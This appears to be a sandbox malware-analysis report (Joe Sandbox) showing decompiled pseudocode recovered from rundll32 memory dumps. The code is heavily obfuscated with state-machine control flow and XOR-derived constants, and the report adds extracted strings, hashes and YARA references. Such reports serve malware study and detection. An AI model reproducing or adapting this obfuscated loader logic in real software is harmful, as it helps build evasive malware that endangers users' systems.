				_t835 = 0xa;
				_v172 = _v172 / _t835;
				_v172 = _v172 << 8;
				_v172 = _v172 ^ 0x00505c00;
				_v148 = 0xec35;
				_v148 = _v148 >> 0xc;
				_v148 = _v148 << 6;
				_v148 = _v148 ^ 0x00040380;
				_v180 = 0xfe27;
				_v180 = _v180 >> 0xe;
				_v180 = _v180 >> 0xb;
				_v180 = _v180 ^ 0x04000000;
				_v124 = 0x1d9b;
				_v124 = _v124 >> 2;
				_v124 = _v124 + 0xe7fe;
				_v124 = _v124 ^ 0x0008ef64;
				_v100 = 0x81fc;
				_v100 = _v100 >> 6;
				_v100 = _v100 ^ 0x00000007;
				_v188 = 0xe2f5;
				_v188 = _v188 ^ 0x71f5675a;
				_v188 = _v188 | 0xaa328868;
				_v188 = _v188 ^ 0xfbf78cef;
				_v176 = 0x473a;
				_v176 = _v176 >> 0xf;
				_t836 = 0x33;
				_v176 = _v176 / _t836;
				_v176 = _v176 ^ 0x80000000;
				_v80 = 0xf23d;
				_v80 = _v80 + 0xffff33d4;
				_v80 = _v80 ^ 0x00002611;
				_v156 = 0xc473;
				_v156 = _v156 >> 0xc;
				_t837 = 0x65;
				_v156 = _v156 * 0x12;
				_v156 = _v156 ^ 0x000000db;
				_v112 = 0xf10b;
				_v112 = _v112 / _t837;
				_v112 = _v112 ^ 0x000006ec;
				_v60 = 0xdfe2;
				_v60 = _v60 ^ 0xa11a41e5;
				_v60 = _v60 ^ 0xa11ac0c1;
				_v184 = 0xb35b;
				_v184 = _v184 + 0xffff738c;
				_v184 = _v184 + 0xaea7;
				_v184 = _v184 ^ 0x0000b6b5;
				_v104 = 0xd6d;
				_v104 = _v104 | 0x69c9fc48;
				_v104 = _v104 ^ 0x69c98054;
				_v280 = 0x128c;
				_v280 = _v280 | 0x3ab331cb;
				_v280 = _v280 << 0xd;
				_t838 = 0x6e;
				_v280 = _v280 / _t838;
				_v280 = _v280 ^ 0x00ee7109;
				_v192 = 0x915d;
				_v192 = _v192 << 3;
				_v192 = _v192 ^ 0x4be63910;
				_v192 = _v192 ^ 0x4be2c2bd;
				_v256 = 0x1d7e;
				_v256 = _v256 << 0xc;
				_v256 = _v256 + 0x423a;
				_v256 = _v256 >> 2;
				_v256 = _v256 ^ 0x00763d31;
				_v264 = 0xd93b;
				_v264 = _v264 >> 0x10;
				_v264 = _v264 + 0xbaa;
				_v264 = _v264 * 0x53;
				_v264 = _v264 ^ 0x0003caf0;
				_v276 = 0x45bb;
				_v276 = _v276 >> 0xe;
				_t839 = 0x52;
				_v276 = _v276 / _t839;
				_v276 = _v276 | 0xacdb8348;
				_v276 = _v276 ^ 0xacdbabf1;
				_v168 = 0x21d1;
				_t840 = 0x5f;
				_v168 = _v168 * 0x6c;
				_v168 = _v168 | 0xdafc5a22;
				_v168 = _v168 ^ 0xdafe2196;
				_v196 = 0xddc4;
				_v196 = _v196 >> 7;
				_v196 = _v196 / _t840;
				_v196 = _v196 ^ 0x00004407;
				_v72 = 0x5faa;
				_t841 = 0x19;
				_v72 = _v72 * 0x1f;
				_v72 = _v72 ^ 0x000beafb;
				_v144 = 0x94da;
				_v144 = _v144 | 0xc2399f35;
				_v144 = _v144 ^ 0x39a01d15;
				_v144 = _v144 ^ 0xfb99dd4a;
				_v152 = 0xccbe;
				_v152 = _v152 | 0x7027dc53;
				_v152 = _v152 ^ 0xf82ab60d;
				_v152 = _v152 ^ 0x880d3695;
				_v224 = 0xbc89;
				_v224 = _v224 + 0x37f5;
				_v224 = _v224 << 4;
				_v224 = _v224 + 0xba4c;
				_v224 = _v224 ^ 0x00103e7c;
				_v88 = 0x13fb;
				_v88 = _v88 / _t841;
				_v88 = _v88 ^ 0x0000146e;
				_v216 = 0x2a85;
				_v216 = _v216 >> 0xc;
				_v216 = _v216 >> 0xb;
				_v216 = _v216 + 0xffff9599;
				_v216 = _v216 ^ 0xffffae90;
				_v64 = 0x23ad;
				_v64 = _v64 + 0x6280;
				_v64 = _v64 ^ 0x0000a8ff;
				_v244 = 0xad34;
				_t842 = 0x78;
				_v244 = _v244 / _t842;
				_v244 = _v244 | 0x167eb282;
				_v244 = _v244 + 0xffff1b5d;
				_v244 = _v244 ^ 0x167d9f04;
				_v48 = 0xe2d3;
				_t843 = 0x44;
				_v48 = _v48 / _t843;
				_v48 = _v48 ^ 0x00006548;
				_v212 = 0x1f13;
				_v212 = _v212 | 0x5cd55339;
				_v212 = _v212 * 0x69;
				_v212 = _v212 << 0xf;
				_v212 = _v212 ^ 0x0799ff86;
				_v252 = 0x103d;
				_t844 = 0x2c;
				_v252 = _v252 / _t844;
				_v252 = _v252 << 1;
				_v252 = _v252 ^ 0x1506d405;
				_v252 = _v252 ^ 0x1506fe58;
				_v228 = 0xc990;
				_v228 = _v228 >> 0x10;
				_v228 = _v228 ^ 0xb1dbef51;
				_v228 = _v228 + 0xffff081c;
				_v228 = _v228 ^ 0xb1dafd56;
				_v40 = 0x9a48;
				_v40 = _v40 + 0xffff0212;
				_v40 = _v40 ^ 0xffffae48;
				_v108 = 0x52c;
				_v108 = _v108 >> 4;
				_v108 = _v108 ^ 0x0000049e;
				_v220 = 0x8eda;
				_v220 = _v220 | 0x6dde0b3f;
				_v220 = _v220 << 0xc;
				_v220 = _v220 >> 3;
				_v220 = _v220 ^ 0x1d1fa9c0;
				_v52 = 0xd0e6;
				_v52 = _v52 ^ 0x110e7ea1;
				_v52 = _v52 ^ 0x110ecde5;
				_v32 = 0xfc2c;
				_t845 = 0x76;
				_v32 = _v32 / _t845;
				_v32 = _v32 ^ 0x000058ce;
				_v268 = 0x3002;
				_v268 = _v268 ^ 0xd0ce5963;
				_v268 = _v268 + 0x23d4;
				_v268 = _v268 ^ 0x2e4fc162;
				_v268 = _v268 ^ 0xfe811412;
				_v236 = 0x3882;
				_v236 = _v236 >> 4;
				_v236 = _v236 + 0xffff636b;
				_v236 = _v236 << 4;
				_v236 = _v236 ^ 0xfff66e05;
				_v164 = 0x6dca;
				_t846 = 0x60;
				_v164 = _v164 / _t846;
				_v164 = _v164 + 0x77ed;
				_v164 = _v164 ^ 0x00001e7b;
				_v92 = 0x939d;
				_v92 = _v92 >> 0xe;
				_v92 = _v92 ^ 0x00001fb9;
				_v76 = 0xa6db;
				_t847 = 9;
				_v76 = _v76 * 0x46;
				_v76 = _v76 ^ 0x002da3d1;
				_v44 = 0xb214;
				_v44 = _v44 << 8;
				_v44 = _v44 ^ 0x00b26442;
				_v84 = 0xa70c;
				_v84 = _v84 / _t847;
				_v84 = _v84 ^ 0x00002a18;
				_v68 = 0xaf49;
				_t848 = 0x2e;
				_v68 = _v68 / _t848;
				_v68 = _v68 ^ 0x0000641b;
				_v36 = 0x3ceb;
				_t849 = 0x59;
				_v36 = _v36 / _t849;
				_v36 = _v36 ^ 0x0000250b;
				_v140 = 0x9e7;
				_v140 = _v140 ^ 0x2629db66;
				_v140 = _v140 ^ 0xb17286d6;
				_v140 = _v140 ^ 0x975b0c98;
				_v232 = 0x59a3;
				_v232 = _v232 + 0xffff4634;
				_v232 = _v232 + 0xbf67;
				_v232 = _v232 * 0x49;
				_v232 = _v232 ^ 0x001b190f;
				_v240 = 0x1d63;
				_v240 = _v240 + 0xffffb330;
				_v240 = _v240 << 5;
				_v240 = _v240 | 0x294c4af2;
				_v240 = _v240 ^ 0xfffe5dea;
				_v96 = 0xdd85;
				_v96 = _v96 / _t849;
				_v96 = _v96 ^ 0x00000a46;
				_v248 = 0x1e49;
				_t850 = 0x45;
				_v248 = _v248 / _t850;
				_v248 = _v248 >> 4;
				_t851 = 0x1e;
				_v248 = _v248 * 0xa;
				_v248 = _v248 ^ 0x000078ce;
				_v160 = 0x9fac;
				_v160 = _v160 / _t851;
				_v160 = _v160 + 0xffff662a;
				_v160 = _v160 ^ 0xffff2cd4;
				_v56 = 0x53a;
				_v56 = _v56 >> 8;
				_v56 = _v56 ^ 0x000063d6;
				_v208 = 0x254f;
				_v208 = _v208 + 0xffff5d99;
				_v208 = _v208 >> 6;
				_v208 = _v208 >> 8;
				_v208 = _v208 ^ 0x0003aa31;
				_v136 = 0xe4f;
				_t852 = 5;
				_v136 = _v136 / _t852;
				_t853 = 0x59;
				_v136 = _v136 / _t853;
				_v136 = _v136 ^ 0x00004294;
				_v200 = 0xf4ca;
				_v200 = _v200 + 0xfcaa;
				_v200 = _v200 << 0x10;
				_v200 = _v200 + 0x7aed;
				_v200 = _v200 ^ 0xf1741e18;
				_v120 = 0x8825;
				_v120 = _v120 ^ 0xde537c51;
				_v120 = _v120 + 0xffff7f06;
				_v120 = _v120 ^ 0xde5329e7;
				_v128 = 0x8774;
				_v128 = _v128 * 0x60;
				_v128 = _v128 >> 9;
				_v128 = _v128 ^ 0x000048ff;
				_t854 = _v16;
				_t702 = _v284;
				while(1) {
					L1:
					_t815 = 0x1a641754;
					while(1) {
						_t865 = _t855 - _t815;
						if(_t865 > 0) {
							goto L19;
						}
						L3:
						if(_t865 == 0) {
							__eflags = E00439D2F(_t854, _a4);
							_t855 = 0x323551c7;
							_t720 = 1;
							_t861 =  !=  ? _t720 : _t861;
							goto L13;
						} else {
							if(_t855 == 0x175d2af) {
								_t855 = 0x3b541ff0;
								continue;
							} else {
								if(_t855 == 0x5ea51a5) {
									_push(_t745);
									_t702 = E00447AF1(_v244, _v48, _v24, _t745, _a36, _t745, _a16, _t745, _v156, _v212, _v252, _v228);
									_t863 = _t863 + 0x2c;
									_v284 = _t702;
									__eflags = _t702;
									_t855 =  !=  ? 0xa2907ca : 0x6317f3c;
									goto L14;
								} else {
									if(_t855 == 0x6317f3c) {
										E00437E91(_v24, _v120, _v128);
									} else {
										if(_t855 == 0x9b9cf87) {
											__eflags = E0044C2F5(_t854, _v204, __eflags) - _v260;
											_t815 = 0x1a641754;
											_t702 = _v284;
											_t745 = _v288;
											_t855 =  ==  ? 0x1a641754 : 0x323551c7;
											continue;
										} else {
											if(_t855 != 0xa2907ca) {
												L41:
												__eflags = _t855 - 0x34df9831;
												if(__eflags != 0) {
													_t702 = _v284;
													while(1) {
														_t865 = _t855 - _t815;
														if(_t865 > 0) {
															goto L19;
														}
														goto L3;
													}
													goto L19;
												}
											} else {
												_t871 = _t740;
												if(_t740 != 0) {
													_push(0x431640);
													_push(_v52);
													_push(_v220);
													_t739 = E00435DFC(_v40, _v108, _t871);
													_t745 = _t739;
													_t863 = _t863 + 0xc;
													_v288 = _t739;
												}
												_t564 =  &_v92; // 0xa46
												_t734 = E004423BF(_v32, _v268, _a12, _t745, _t745, _v176 | _v188 | _v100 | _v124 | _v180 | _v148 | _v172 | _v132 | _v116, _v284, _t745, _t745, _v236, _t745, _v164,  *_t564);
												_t854 = _t734;
												_t760 = _v76;
												E00440D6D(_v76, _v44, _v84, _v288);
												_t863 = _t863 + 0x34;
												if(_t734 == 0) {
													L38:
													_t855 = 0x24a54ebe;
												} else {
													_v12 = 1;
													_t738 = E0043A074( &_v12, _t760, _v68, _v36, _t854, _v140);
													_t863 = _t863 + 0x14;
													_v12 = _t738;
													_t855 = 0x35deb4bf;
												}
												L13:
												_t702 = _v284;
												L14:
												_t745 = _v288;
												goto L1;
											}
										}
									}
								}
							}
						}
						L44:
						return _t861;
						L19:
						__eflags = _t855 - 0x24a54ebe;
						if(_t855 == 0x24a54ebe) {
							E00437E91(_t702, _v136, _v200);
							_t855 = 0x6317f3c;
							goto L40;
						} else {
							__eflags = _t855 - 0x323551c7;
							if(_t855 == 0x323551c7) {
								E00437E91(_t854, _v56, _v208);
								goto L38;
							} else {
								__eflags = _t855 - 0x335a9f57;
								if(_t855 == 0x335a9f57) {
									_push(_t745);
									_t706 = E0043F853(_v72, _v144, _v152, _v80, _v224, _v28, _t745, _t745, _v88);
									__eflags = _t706;
									_v24 = _t706;
									_t855 =  !=  ? 0x5ea51a5 : 0x34df9831;
									E0043DE81(_v216, _v28, _v64);
									_t863 = _t863 + 0x24;
									L40:
									_t745 = _v288;
									_t815 = 0x1a641754;
									goto L41;
								} else {
									__eflags = _t855 - 0x35deb4bf;
									if(_t855 == 0x35deb4bf) {
										__eflags = _t740;
										if(_t740 == 0) {
											_t750 = 0;
											__eflags = 0;
										} else {
											_t750 =  *_t740;
										}
										__eflags = _t740;
										if(_t740 == 0) {
											_t709 = 0;
											__eflags = 0;
										} else {
											_t709 =  *((intOrPtr*)(_t740 + 4));
										}
										E004446C1(_v16, _t854, _t750, _v232, _v240, _v96, _t709, _v248, _t750, _v160);
										_t863 = _t863 + 0x20;
										asm("sbb esi, esi");
										_t855 = (_t855 & 0xd7847dc0) + 0x323551c7;
										goto L13;
									} else {
										__eflags = _t855 - 0x3b541ff0;
										if(_t855 != 0x3b541ff0) {
											goto L41;
										} else {
											_v20 = 0x200;
											_t714 = E004354FB(0x200);
											_t858 = _t714;
											_t764 = 0x200;
											__eflags = _t714;
											if(__eflags != 0) {
												_t716 = E004371C3(_v184, _v104, _t858, _v280, _v192,  &_v20);
												_t863 = _t863 + 0x14;
												__eflags = _t716;
												if(_t716 == 0) {
													_push(_v276);
													_push(_t764);
													_t718 = E0043ECFE(_v256, _v264, _t858, _v272, _t764);
													_t863 = _t863 + 0x14;
													_v28 = _t718;
												}
												E0043DE81(_v168, _t858, _v196);
											}
											_t855 = 0x335a9f57;
											goto L13;
										}
									}
								}
							}
						}
						goto L44;
					}
				}
			}

0x00447bcd
0x00447bd6
0x00447be0
0x00447be7
0x00447bee
0x00447bf5
0x00447bfc
0x00447c03
0x00447c04
0x00447c05
0x00447c0c
0x00447c13
0x00447c1a
0x00447c1c
0x00447c21
0x00447c2e
0x00447c35
0x00447c38
0x00447c41
0x00447c49
0x00447c4b
0x00447c55
0x00447c5d
0x00447c62
0x00447c67
0x00447c6f
0x00447c77
0x00447c7f
0x00447c84
0x00447c91
0x00447c96
0x00447c9c
0x00447ca4
0x00447cb0
0x00447cb5
0x00447cc0
0x00447cc3
0x00447cc7
0x00447cd0
0x00447cd4
0x00447cdc
0x00447cef
0x00447cf6
0x00447d01
0x00447d0c
0x00447d1f
0x00447d26
0x00447d31
0x00447d43
0x00447d46
0x00447d4d
0x00447d55
0x00447d60
0x00447d6b
0x00447d75
0x00447d7d
0x00447d88
0x00447d90
0x00447d95
0x00447d9a
0x00447da2
0x00447dad
0x00447db5
0x00447dc0
0x00447dcb
0x00447dd6
0x00447dde
0x00447de6
0x00447dee
0x00447df6
0x00447dfe
0x00447e06
0x00447e11
0x00447e22
0x00447e27
0x00447e30
0x00447e3b
0x00447e46
0x00447e51
0x00447e5c
0x00447e67
0x00447e77
0x00447e7a
0x00447e81
0x00447e8c
0x00447ea2
0x00447ea9
0x00447eb4
0x00447ebf
0x00447eca
0x00447ed5
0x00447edd
0x00447ee5
0x00447eed
0x00447ef5
0x00447f00
0x00447f0b
0x00447f16
0x00447f1e
0x00447f26
0x00447f2f
0x00447f32
0x00447f36
0x00447f3e
0x00447f46
0x00447f4b
0x00447f53
0x00447f5b
0x00447f63
0x00447f68
0x00447f70
0x00447f75
0x00447f7d
0x00447f85
0x00447f8a
0x00447f97
0x00447f9b
0x00447fa3
0x00447fab
0x00447fb8
0x00447fbd
0x00447fc3
0x00447fcb
0x00447fd3
0x00447fe6
0x00447fe9
0x00447ff0
0x00447ffb
0x00448006
0x0044800e
0x0044801b
0x0044801f
0x00448027
0x0044803a
0x0044803d
0x00448044
0x0044804f
0x0044805a
0x00448065
0x00448070
0x0044807b
0x00448086
0x00448091
0x0044809c
0x004480a7
0x004480af
0x004480b7
0x004480bc
0x004480c4
0x004480cc
0x004480e2
0x004480e9
0x004480f4
0x004480fc
0x00448101
0x00448106
0x0044810e
0x00448116
0x00448121
0x0044812c
0x00448137
0x00448143
0x00448148
0x0044814e
0x00448156
0x0044815e
0x00448166
0x00448178
0x0044817b
0x00448182
0x0044818d
0x00448195
0x004481a2
0x004481a6
0x004481ab
0x004481b5
0x004481c3
0x004481c8
0x004481ce
0x004481d2
0x004481da
0x004481e2
0x004481ea
0x004481ef
0x004481f7
0x004481ff
0x00448207
0x00448212
0x0044821d
0x00448228
0x00448233
0x0044823b
0x00448246
0x0044824e
0x00448256
0x0044825b
0x00448260
0x00448268
0x00448273
0x0044827e
0x00448289
0x0044829b
0x004482a0
0x004482a9
0x004482b4
0x004482bc
0x004482c4
0x004482cc
0x004482d4
0x004482dc
0x004482e4
0x004482e9
0x004482f1
0x004482f6
0x004482fe
0x00448310
0x00448315
0x0044831e
0x00448329
0x00448334
0x0044833f
0x00448347
0x00448352
0x00448365
0x00448368
0x0044836f
0x0044837a
0x00448385
0x0044838d
0x00448398
0x004483ae
0x004483b5
0x004483c0
0x004483d2
0x004483d5
0x004483dc
0x004483e7
0x004483fd
0x00448402
0x00448409
0x00448414
0x0044841f
0x0044842a
0x00448435
0x00448440
0x00448448
0x00448450
0x0044845f
0x00448463
0x0044846b
0x00448473
0x0044847b
0x00448480
0x00448488
0x00448490
0x004484a6
0x004484ad
0x004484b8
0x004484c4
0x004484c9
0x004484cf
0x004484d9
0x004484dc
0x004484e0
0x004484e8
0x004484fe
0x00448505
0x00448510
0x0044851b
0x00448526
0x0044852e
0x00448539
0x00448541
0x00448549
0x0044854e
0x00448553
0x0044855b
0x0044856d
0x00448572
0x00448582
0x00448585
0x0044858c
0x00448597
0x0044859f
0x004485a7
0x004485ac
0x004485b4
0x004485bc
0x004485c7
0x004485d2
0x004485dd
0x004485e8
0x004485fb
0x00448602
0x0044860a
0x00448615
0x0044861c
0x00448620
0x00448620
0x00448620
0x00448625
0x00448625
0x00448627
0x00000000
0x00000000
0x0044862d
0x0044862d
0x0044881b
0x0044881d
0x00448824
0x00448825
0x00000000
0x00448633
0x00448639
0x00448803
0x00000000
0x0044863f
0x00448646
0x004487ac
0x004487e3
0x004487e8
0x004487eb
0x004487ef
0x004487fb
0x00000000
0x0044864c
0x00448652
0x00448a20
0x00448658
0x0044865e
0x00448795
0x00448797
0x0044879c
0x004487a0
0x004487a4
0x00000000
0x00448664
0x0044866b
0x004489fa
0x004489fa
0x00448a00
0x00448a02
0x00448625
0x00448625
0x00448627
0x00000000
0x00000000
0x00000000
0x00448627
0x00000000
0x00448625
0x00448671
0x00448671
0x00448673
0x00448675
0x0044867a
0x00448681
0x00448693
0x00448698
0x0044869a
0x0044869d
0x0044869d
0x004486da
0x00448708
0x00448711
0x00448721
0x00448728
0x0044872d
0x00448732
0x004489cf
0x004489cf
0x00448738
0x00448751
0x00448760
0x00448765
0x00448768
0x0044876f
0x0044876f
0x00448774
0x00448774
0x00448778
0x00448778
0x00000000
0x00448778
0x0044866b
0x0044865e
0x00448652
0x00448646
0x00448639
0x00448a28
0x00448a32
0x0044882d
0x0044882d
0x00448833
0x004489e6
0x004489ec
0x00000000
0x00448839
0x00448839
0x0044883f
0x004489c9
0x00000000
0x00448845
0x00448845
0x0044884b
0x00448954
0x00448985
0x00448998
0x004489a3
0x004489af
0x004489b2
0x004489b7
0x004489f1
0x004489f1
0x004489f5
0x00000000
0x00448851
0x00448851
0x00448857
0x004488fc
0x004488fe
0x00448904
0x00448904
0x00448900
0x00448900
0x00448900
0x00448906
0x00448908
0x0044890f
0x0044890f
0x0044890a
0x0044890a
0x0044890a
0x00448937
0x0044893c
0x00448941
0x00448949
0x00000000
0x0044885d
0x0044885d
0x00448863
0x00000000
0x00448869
0x0044887f
0x00448886
0x0044888b
0x0044888d
0x0044888e
0x00448890
0x004488b1
0x004488b6
0x004488b9
0x004488bb
0x004488bd
0x004488c1
0x004488d0
0x004488d5
0x004488d8
0x004488d8
0x004488ec
0x004488f1
0x004488f2
0x00000000
0x004488f2
0x00448863
0x00448857
0x0044884b
0x0044883f
0x00000000
0x00448833
0x00448625

Strings

5, xrefs: 00447D60
O 6, xrefs: 00447C21
O%, xrefs: 00448539
z, xrefs: 004485AC
w, xrefs: 0044831E
m, xrefs: 00447EF5
^, xrefs: 00447D01
q, xrefs: 00447F36
:G, xrefs: 00447E06
P26, xrefs: 00447CF6
<, xrefs: 004483E7
He, xrefs: 00448182
1=v, xrefs: 00447F75
Fe, xrefs: 004486DA

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: q$1=v$5$:G$Fe$He$O 6$O%$P26$m$<$^$w$z
API String ID: 0-1231479166
Opcode ID: 7bc109914e1cc80e857e2327797686ff8b7db1f8db67043aadf576b9fc0b380a
Instruction ID: b84e3b40e51bb5999637355593f0c91a68ae60019e14bc3604c3dc6d8276dc4a
Opcode Fuzzy Hash: 7bc109914e1cc80e857e2327797686ff8b7db1f8db67043aadf576b9fc0b380a
Instruction Fuzzy Hash: 5A7201715083818BE378CF25C88AB9FBBE1BBC4318F10891EE5D996260D7B99845CF53

Uniqueness

Uniqueness Score: -1.00%

Function 00187132, Relevance: 18.2, Strings: 14, Instructions: 657COMMON

Download Yara Rule

Strings

Fe, xrefs: 00187C4E
w, xrefs: 00187892
1=v, xrefs: 001874E9
q, xrefs: 001874AA
O%, xrefs: 00187AAD
^, xrefs: 00187275
:G, xrefs: 0018737A
z, xrefs: 00187B20
He, xrefs: 001876F6
O 6, xrefs: 00187195
P26, xrefs: 0018726A
m, xrefs: 00187469
5, xrefs: 001872D4
<, xrefs: 0018795B

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: q$1=v$5$:G$Fe$He$O 6$O%$P26$m$<$^$w$z
API String ID: 0-1231479166
Opcode ID: 90f7e4b74cd69b9e8d8fb0eb31b32ba8bcc002e4b44665f3d9518842981e090a
Instruction ID: e841b7c6f6d2b5a64b9ee8ad2f69eb4037c07942b689b8f35e7bc4ad27d21973
Opcode Fuzzy Hash: 90f7e4b74cd69b9e8d8fb0eb31b32ba8bcc002e4b44665f3d9518842981e090a
Instruction Fuzzy Hash: 6272FF7160C3818BE378CF25C88AB9BBBE2BBD4314F10891DE5D9962A0D7B58945CF42

Uniqueness

Uniqueness Score: -1.00%

Function 004367EF, Relevance: 16.7, Strings: 13, Instructions: 464
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E004367EF(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				unsigned int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				unsigned int _v192;
				signed int _v196;
				signed int _v200;
				unsigned int _v204;
				signed int _v208;
				signed int _v212;
				void* _t431;
				intOrPtr _t476;
				intOrPtr _t482;
				intOrPtr _t483;
				signed int _t485;
				signed int _t487;
				signed int _t493;
				intOrPtr _t494;
				void* _t495;
				intOrPtr _t503;
				intOrPtr _t505;
				signed int _t509;
				signed int* _t510;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				intOrPtr _t526;
				intOrPtr _t554;
				intOrPtr _t558;
				void* _t559;
				intOrPtr _t561;
				intOrPtr _t565;
				void* _t567;
				signed int* _t582;
				void* _t585;

				_push(_a8);
				_t510 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00442550(_t431);
				_v12 = 0x17937f;
				_t565 = 0;
				_v8 = 0x716496;
				_t582 =  &(( &_v212)[4]);
				_v4 = 0;
				_v140 = 0x4104;
				_t567 = 0x31a072da;
				_v140 = _v140 + 0x447c;
				_t512 = 0x2c;
				_v140 = _v140 * 0x19;
				_v140 = _v140 ^ 0x000d6f8e;
				_v128 = 0xcf3;
				_v128 = _v128 + 0xfffff042;
				_v128 = _v128 * 0x3e;
				_v128 = _v128 ^ 0xffffd2d2;
				_v124 = 0x2a0f;
				_v124 = _v124 << 7;
				_v124 = _v124 * 0x70;
				_v124 = _v124 ^ 0x0933c800;
				_v148 = 0x338f;
				_v148 = _v148 / _t512;
				_v148 = _v148 + 0xffff0b9c;
				_v148 = _v148 ^ 0xffff0cc6;
				_v96 = 0x90ec;
				_v96 = _v96 | 0x4c75b133;
				_v96 = _v96 ^ 0x4c75b1bf;
				_v48 = 0x862e;
				_v48 = _v48 >> 9;
				_v48 = _v48 ^ 0xf0000043;
				_v192 = 0xba1e;
				_v192 = _v192 >> 0xd;
				_v192 = _v192 << 0x10;
				_v192 = _v192 >> 0xd;
				_v192 = _v192 ^ 0x000059bb;
				_v200 = 0x378e;
				_v200 = _v200 + 0xffff308c;
				_v200 = _v200 | 0x3e586b1b;
				_v200 = _v200 ^ 0x5185d5a4;
				_v200 = _v200 ^ 0xae7ac2ae;
				_v168 = 0xb2ed;
				_t513 = 0x5d;
				_v168 = _v168 / _t513;
				_v168 = _v168 | 0xc5bdafdd;
				_v168 = _v168 ^ 0xc5bde408;
				_v176 = 0xc4df;
				_v176 = _v176 >> 2;
				_v176 = _v176 ^ 0xd9c03405;
				_v176 = _v176 * 0x17;
				_v176 = _v176 ^ 0x90401e33;
				_v116 = 0x79ce;
				_v116 = _v116 * 0x3b;
				_v116 = _v116 << 4;
				_v116 = _v116 ^ 0x01c12efe;
				_v88 = 0x4199;
				_v88 = _v88 >> 1;
				_v88 = _v88 ^ 0x000016ee;
				_v32 = 0xc8e6;
				_v32 = _v32 | 0x9bed8174;
				_v32 = _v32 ^ 0x9bed9e1f;
				_v188 = 0x5390;
				_t514 = 0x3a;
				_v188 = _v188 / _t514;
				_v188 = _v188 << 6;
				_v188 = _v188 | 0x3d2eb713;
				_v188 = _v188 ^ 0x3d2edd0a;
				_v204 = 0x58fb;
				_v204 = _v204 >> 6;
				_v204 = _v204 + 0xf15b;
				_v204 = _v204 ^ 0x0000d418;
				_v72 = 0x9f3d;
				_v72 = _v72 + 0xffff3777;
				_v72 = _v72 ^ 0xffff8242;
				_v24 = 0xde3b;
				_t515 = 0xc;
				_v24 = _v24 * 0x21;
				_v24 = _v24 ^ 0x001cbf65;
				_v52 = 0x9dec;
				_v52 = _v52 | 0xa1e041a1;
				_v52 = _v52 ^ 0xa1e09fab;
				_v108 = 0x27;
				_v108 = _v108 + 0xffffcee9;
				_v108 = _v108 + 0x86d7;
				_v108 = _v108 ^ 0x00006510;
				_v60 = 0x3380;
				_v60 = _v60 ^ 0xb4567d2a;
				_v60 = _v60 ^ 0xb4565f0c;
				_v68 = 0x71f5;
				_v68 = _v68 >> 0xd;
				_v68 = _v68 ^ 0x00006eec;
				_v132 = 0x63a2;
				_v132 = _v132 | 0xa34eb625;
				_v132 = _v132 << 0x10;
				_v132 = _v132 ^ 0xf7a77efa;
				_v84 = 0x4025;
				_v84 = _v84 >> 3;
				_v84 = _v84 ^ 0x0000336a;
				_v92 = 0xf737;
				_v92 = _v92 / _t515;
				_v92 = _v92 ^ 0x000070d8;
				_v112 = 0xe747;
				_t516 = 0x45;
				_v112 = _v112 / _t516;
				_v112 = _v112 << 1;
				_v112 = _v112 ^ 0x00003bc1;
				_v100 = 0x5c9c;
				_v100 = _v100 << 5;
				_v100 = _v100 ^ 0x000ba43a;
				_v56 = 0x8dc3;
				_t517 = 0x46;
				_v56 = _v56 * 0x53;
				_v56 = _v56 ^ 0x002dfe13;
				_v144 = 0x7f61;
				_v144 = _v144 * 0x38;
				_v144 = _v144 ^ 0x6f8821ea;
				_v144 = _v144 ^ 0x6f938ffa;
				_v160 = 0x339d;
				_v160 = _v160 / _t517;
				_v160 = _v160 >> 0xe;
				_v160 = _v160 ^ 0x00006f53;
				_v136 = 0xb124;
				_v136 = _v136 * 0x7c;
				_v136 = _v136 * 0x3b;
				_v136 = _v136 ^ 0x13c6547a;
				_v196 = 0xba81;
				_v196 = _v196 / _t517;
				_t518 = 0x70;
				_v196 = _v196 / _t518;
				_v196 = _v196 + 0x66bc;
				_v196 = _v196 ^ 0x00000a53;
				_v36 = 0x2f28;
				_t519 = 0x7d;
				_v36 = _v36 * 0x2b;
				_v36 = _v36 ^ 0x0007f00e;
				_v184 = 0xa6cb;
				_v184 = _v184 << 4;
				_v184 = _v184 >> 0xe;
				_v184 = _v184 * 0x42;
				_v184 = _v184 ^ 0x00006eb4;
				_v44 = 0x29af;
				_v44 = _v44 / _t519;
				_v44 = _v44 ^ 0x00000c2e;
				_v76 = 0xf2bd;
				_v76 = _v76 + 0xffff85ae;
				_v76 = _v76 ^ 0x0000580a;
				_v180 = 0x9e33;
				_v180 = _v180 + 0xb14;
				_t520 = 0x22;
				_v180 = _v180 / _t520;
				_v180 = _v180 ^ 0x06128f94;
				_v180 = _v180 ^ 0x061285a5;
				_v156 = 0xb8a6;
				_v156 = _v156 + 0xffff4ef3;
